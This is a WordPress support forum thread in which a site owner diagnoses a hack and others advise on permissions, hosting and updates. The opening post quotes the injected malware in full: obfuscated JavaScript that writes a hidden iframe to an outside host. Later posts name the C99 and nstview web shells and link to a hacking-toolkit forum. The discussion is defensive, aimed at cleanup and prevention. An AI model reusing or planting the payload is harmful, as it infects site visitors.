Support » Fixing WordPress » WordPress 2.3.3 HACKED

  • Last week my site was hacked. Multiple wordpress files had the following code appended at the very end:

    <script language="JavaScript"> eval(unescape("document.write%28String.fromCharCode%2860%2C105%2C102%2C114%2C97%2C109%2C101%2C32%2C115%2C114%2C99%2C61%2C34%2C104%2C116%2C116%2C112%2C58%2C47%2C47%2C101%2C97%2C45%2C100%2C118%2C46%2C114%2C117%2C47%2C116%2C100%2C115%2C47%2C105%2C110%2C100%2C101%2C120%2C46%2C112%2C104%2C112%2C34%2C32%2C119%2C105%2C100%2C116%2C104%2C61%2C34%2C48%2C34%2C32%2C104%2C101%2C105%2C103%2C104%2C116%2C61%2C34%2C48%2C34%2C62%2C60%2C47%2C105%2C102%2C114%2C97%2C109%2C101%2C62%29%29%3B")); </script>

    This was in many wp-*.php files. I wiped my entire websites http root and installed the latest version of WP (2.3.3) since I was running an older version and I knew there were security fixes. I thought I was covered, until last night the same exact exploit was performed on my site. Again, this is a 100% clean 2.3.3 installation. I’m 99% confident this has nothing to do with a password hack or any type of internal access since the js code is haphazardly appended to the end of various files. The only way I even noticed this “hack” is because the code invalidates/breaks my rss feed.

    I found one prior instance of this hack on this board, and it was with an older version of wordpress. I have NOTHING else installed on this site, wordpress 2.3.3 is the only files in my http root. The ONLY plugins I have installed or even on the server are Askimet and Feed Locations.

    Aside from changing my passwords (which I’m certain will not close this loophole), is there any way to prevent this from happening?

Viewing 15 replies - 1 through 15 (of 16 total)
  • Thread Starter skitals

    (@skitals)

    As far as I can tell, the only file modified this time around was wp-settings.php. Removing the code from that file fixed my rss feed, but there still may be more modified files that I can’t find as there was last time.

    Yes. You can inform, no, you must inform your host. It might happen that the server has been hacked through another site and from there they (the hackers) got access to all sites on that machine…

    I’m 99% confident this has nothing to do with a password hack or any type of internal access since the js code is haphazardly appended to the end of various files.

    and the permissions of those files were?

    also:

    here are some headers returned by your site:

    HTTP/1.1 200 OK
    Date: Thu, 21 Feb 2008 03:37:32 GMT
    Server: Apache/2.0.54 (Unix) PHP/4.4.7 mod_ssl/2.0.54 OpenSSL/0.9.7e mod_fastcgi/2.4.2 DAV/2 SVN/1.4.2
    X-Powered-By: PHP/5.2.3
    X-Pingback: http://www.gamerawr.com/xmlrpc.php
    Vary: Accept-Encoding
    Content-Type: text/html; charset=UTF-8

    You may not know this but Apache 2.0.54 is a little dated, and there have been several security issues fixed since that release.

    Is that a dreamhost issue, yes, but that doesnt make it any less an issue.

    I point that out not necessarily to cast doubt, but to say that files being physically changed lends credence to it not being a WP hack, but a server side problem related to what is hosting your site OR a permissions weakness that allowed a breach.

    I can put up a static HTML page on an insecure web server with insecure permissions, and I will be able to find someone that is able to tack malicious code onto that file.

    Thread Starter skitals

    (@skitals)

    Ok, I will be contact dreamhost… but regarding permissions… how should I set my permissions for a wordpress install? You know how WP is, with the over-simplified instructions. I will be honest, I didn’t do anything but upload all the files and run the upgrade script.

    Thread Starter skitals

    (@skitals)

    Ok, a support ticket has been sent to dreamhost. Sorry I was so quick to blame this on WP, I just forgot how many variables there are involved in this, especially when running a site on a shared server I don’t administer. I was just under the impression dreamhost was more security conscious than this 🙁

    Thread Starter skitals

    (@skitals)

    I checked my permissions of wp-settings.php (the file hacked), and it is set to 644, which I BELIEVE is correct. Please let me know if this shines any new light on the issue.

    files = 644
    folders = 755
    That’s the correct setting. However, on many hosts you need to make folders like wp-content 777 (i.e. world writable) in order to be able to upload images…

    i’ll bet dollars for donuts that dreamhost calls it out as a WP problem 😛

    Not to suggest that it might not be, just that it’s easier for a host to blame a software package, no matter what the cause.

    Thread Starter skitals

    (@skitals)

    We will see. I gave them a link to this thread as reference. I’ve yet to hear back from them.

    Thread Starter skitals

    (@skitals)

    Crap. It looks like this may all be my own fault. When my site was first hacked with an ancient wordpress version, yes, I erased my entire http root and installed the latest wp release. But what did I copy back? My wp theme. And what was in my theme directory? TWO HACKED PHP/JAVA SCRIPTS!

    One appears to be “nstview”, a file management script included with a lot of “web hacking for newbs” kits. It is tagged at the bottom: <!– Network security team :: nst.void.ru –>

    The is “C99madShell v. 2.0 madnet edition” which also looks to be a remote file manager.

    Now, I have no way of knowing if these are from a related hack, but clearly these are wide open backdoors that hackers somehow installed on my OLD wordpress installation. I can’t believe I’m dense enough to not thoroughly check my personal theme directory when I was trying to be so meticulous in my upgrade.

    With these files removed (that entire theme directory, actually), I guess it’s now just a game of wait and see. I should do a fine search to see if anything else has been tampered with while this backdoor was in place.

    Interestingly enough BOTH of these shell scripts as well as “PHP Injection Scanner” tools were recently posted in a “web hacking tools collection” posted on this script kiddie site: http://www.katzforums.com/showthread.php?t=50022 No doubt that package has everything that was used in this exploit.

    The only question that remains is: is my site still vulnerable?

    Thread Starter skitals

    (@skitals)

    I’m nearly certain whoever did this used the hacking toolset I posted above. I’m looking through it all now, and it even includes an xmlrpc vulnerability scanner and exploiter, which is what I believe the latest WP security update patches.

    So it looks like case closed. It was a known wp vulnerability that was recently patched. The moral of the story is: always keep your installation up to date, and DO NOT BLINDLY COPY BACK YOUR CUSTOMIZED FILES. Perhaps the WP readme should make a point of this in the future. While the vulnerability was plugged, I was still left with the malicious software that was installed.

    Maybe this is a stupid question, but would putting the wp-admin folder under password protection help at all?

    No, not really.

    So I had a client hacked today who had 2.2.?, and after reading this post, I’ve installed 2.3.3 and then uploaded the custom theme from my computer (which is clean).

    The attack was similar, they modified a header.php file and added some javascript code at the end. Would it help if I posted the javascript here (I don’t want to help these hackers, so I wanted to ask first).

    We were tipped off when the client looked at his blog on his PC and got a virus alert about JS/Downloader-AUD and said it was a Trojan.

    (Note, the client was also on DreamHost)

    I just wrote a blog article about this and included a screenshot of the VirusAlert message we received. Hope someone will find this helpful.

    http://aldebaranwebdesign.com/blog/wordpress-hack-causes-virusscan-alert/

Viewing 15 replies - 1 through 15 (of 16 total)
  • The topic ‘WordPress 2.3.3 HACKED’ is closed to new replies.